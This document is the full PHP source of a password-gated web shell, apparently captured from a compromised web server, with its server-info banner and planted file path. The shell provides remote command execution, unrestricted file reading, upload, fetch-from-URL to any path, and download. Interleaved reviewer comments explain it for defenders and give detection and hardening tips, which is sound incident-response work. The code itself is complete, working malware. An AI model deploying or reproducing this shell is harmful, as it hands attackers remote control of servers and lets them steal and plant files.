uawdijnntqw1x1x1
IP : 216.73.217.142
Hostname : localhost.localdomain
Kernel : Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
OS : Linux
<?php
// Reviewer annotation (defensive): this file is a password-gated web shell. Once the
// session is flagged as authenticated, it exposes five request-driven features:
// OS command execution, file/directory read, browser upload, fetch-from-URL to disk,
// and file download. A file like this under a web root should be handled as an
// indicator of compromise: preserve it and the surrounding logs, then scope the
// incident rather than simply deleting it.
// The page title "Web Shell" and the section labels in the markup below are fixed
// strings that content scanners and file-integrity tooling can match on.
//
// error_reporting(0) turns off PHP error reporting for the request, so failures in
// the operations below produce no PHP diagnostics.
error_reporting(0); session_start(); $scriptName = basename(__FILE__);
// Password gate: a POSTed 'password' is compared (strict ===) with a hard-coded
// string literal; on a match the session flag 'authenticated' is set. Nothing in
// this block limits or logs repeated attempts.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { $expectedPassword = 'null'; if ($_POST['password'] === $expectedPassword) { $_SESSION['authenticated'] = true; } else { echo '<div style="color:red;">Invalid password. Access denied.</div>'; } }
// Requests without the session flag get only the password form and then exit(),
// so none of the features below run for an unauthenticated session.
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { ?> <h2>Access Requested?</h2> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" name="password" id="password" required> <button type="submit">Submit</button> </form> <?php exit(); }
// Logout: destroys the session and redirects to this script's own basename.
if (isset($_POST['logout']) && $_POST['logout'] === 'true') { session_destroy(); header("Location: $scriptName"); exit(); } ?> <!DOCTYPE html> <html> <head><title>Web Shell</title></head> <body> <b>Remote Code Execution</b><br /> <form method="GET" action=""> Command: <input type="text" name="command" size="50" value="<?php echo isset($_GET['command']) ? htmlspecialchars($_GET['command']) : ''; ?>" /> <button type="submit">Go</button> </form> <?php
// Command execution: the GET parameter 'command' is handed unmodified to the first
// of shell_exec / exec / system / passthru for which function_exists() is true; the
// result is HTML-escaped and echoed back.
// Detection: the value travels in the URL query string, so access logs that record
// query strings will contain the commands that were issued to this script.
// Hardening: listing these four functions in php.ini disable_functions removes this
// path wherever the application itself does not need them.
if (isset($_GET['command'])) { $cmd = $_GET['command']; echo "<pre>Command: " . htmlspecialchars($cmd) . "\nOutput:\n"; $output = ''; if (function_exists('shell_exec')) { $output = shell_exec($cmd); } elseif (function_exists('exec')) { exec($cmd, $out); $output = implode("\n", $out); } elseif (function_exists('system')) { ob_start(); system($cmd); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); $output = ob_get_clean(); } else { $output = 'No command execution function available.'; } echo htmlspecialchars($output === null ? '(no output)' : $output) . "</pre>"; } ?> <hr /> <b>Retrieve File / Scan Directory</b><br /> Current file path: <?php echo __FILE__; ?><br /> <form method="GET" action=""> Path: <input type="text" name="path" size="50" value="<?php echo isset($_GET['path']) ? 
htmlspecialchars($_GET['path']) : ''; ?>" /> <button type="submit">Go</button> </form> <pre> <?php
// File / directory read: the GET parameter 'path' (an empty value becomes './') is
// resolved with realpath() and then either listed with scandir() or read in full
// with file_get_contents(). No base-directory restriction is applied in this block,
// so the reach is whatever the PHP process account can read; the '@' prefixes hide
// permission warnings.
// Triage: 'path' values in the access log show which files and directories were
// viewed, which helps decide which secrets need rotating.
if (isset($_GET['path'])) { $rawPath = $_GET['path']; $path = ($rawPath === '') ? './' : $rawPath; $real = realpath($path); echo '<b>Realpath:</b> ' . ($real ? htmlspecialchars($real) : 'Failed to resolve') . '<br />'; echo '<b>Type:</b> '; if (is_dir($path)) { echo "Directory<br />"; $items = @scandir($path); if ($items) { foreach ($items as $item) { echo htmlspecialchars($item) . "<br />"; } } else { echo "Unable to read directory."; } } elseif (is_file($path)) { echo "File<br />"; $content = @file_get_contents($path); echo $content !== false ? htmlspecialchars($content) : "Failed to read file."; } else { echo "Not a valid file or directory."; } } ?> </pre> <hr /> <b>Upload File From Your Local Machine</b><br /> <form method="POST" action="" enctype="multipart/form-data"> File(s): <input type="file" name="uploads[]" multiple required /> <button type="submit">Upload</button> </form> <?php
// Browser upload: each entry of $_FILES['uploads'] that arrived without error is
// moved to './' + basename(client file name). Only the directory part of the name
// is stripped; extension and content are not checked, and an existing file with
// the same name is replaced.
// NOTE(review): './' is relative to the process working directory, presumably the
// script's own directory under a web SAPI. Confirm, then inventory that directory
// for files newer than this script.
if (isset($_FILES['uploads'])) { foreach ($_FILES['uploads']['name'] as $i => $name) { if ($_FILES['uploads']['error'][$i] === UPLOAD_ERR_OK) { $tmp = $_FILES['uploads']['tmp_name'][$i]; $dest = './' . basename($name); if (move_uploaded_file($tmp, $dest)) { echo "Successfully uploaded " . htmlspecialchars($name) . "<br />"; } else { echo "Unable to upload " . htmlspecialchars($name) . 
"<br />"; } } } } ?> <hr /> <b>Upload File From URL</b><br /> <form method="POST" action=""> Filename to save: <input type="text" name="save_name" size="30" required /><br /> URL: <input type="text" name="url" size="50" required /> <button type="submit">Upload</button> </form> <pre> <?php
// Fetch-from-URL: the POSTed 'url' is retrieved with file_get_contents() when
// allow_url_fopen is on, otherwise (or if that fails) with cURL following redirects
// under a 30 s timeout. The body is written to the POSTed 'save_name' exactly as
// given; unlike the browser upload, no basename() is applied, so the destination
// is any path the PHP process account can write.
// An empty response makes file_put_contents() return 0, which this code reports as
// a failure even though the file was created.
// Detection / hardening: this feature makes the web server process open outbound
// connections; egress filtering and allow_url_fopen=Off narrow it, and outbound
// flow logs help identify what was pulled in.
if (isset($_POST['save_name']) && isset($_POST['url'])) { $saveAs = $_POST['save_name']; $url = $_POST['url']; $data = false; if (ini_get('allow_url_fopen')) { $data = @file_get_contents($url); } if ($data === false && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); curl_close($ch); } if ($data !== false && file_put_contents($saveAs, $data)) { echo "Successfully uploaded " . htmlspecialchars($saveAs); } else { echo "Unable to upload " . htmlspecialchars($saveAs) . " (check URL or PHP configuration)"; } } ?> </pre> <hr /> <b>Download File From Web Server</b><br /> <form method="GET" action=""> Filename to download: <input type="text" name="download" size="100" required /> <button type="submit">Download</button> </form> <?php
// Download: the GET parameter 'download' names any regular file, which is streamed
// back as an attachment via readfile(). No path restriction is applied here.
// Triage: 'download' values and response sizes in the access log indicate what
// left the host.
if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file) && is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); header('Cache-Control: must-revalidate'); header('Pragma: public'); ob_clean(); flush(); readfile($file); exit; } else { echo "File does not exist or is not a regular file."; } } ?> <hr /> <b>Logout</b><br /> <form method="POST" action=""> <input type="hidden" name="logout" value="true" /> <button type="submit">Logout</button> </form> </body> </html>
/var/www/main-e-syn/public_html/p.php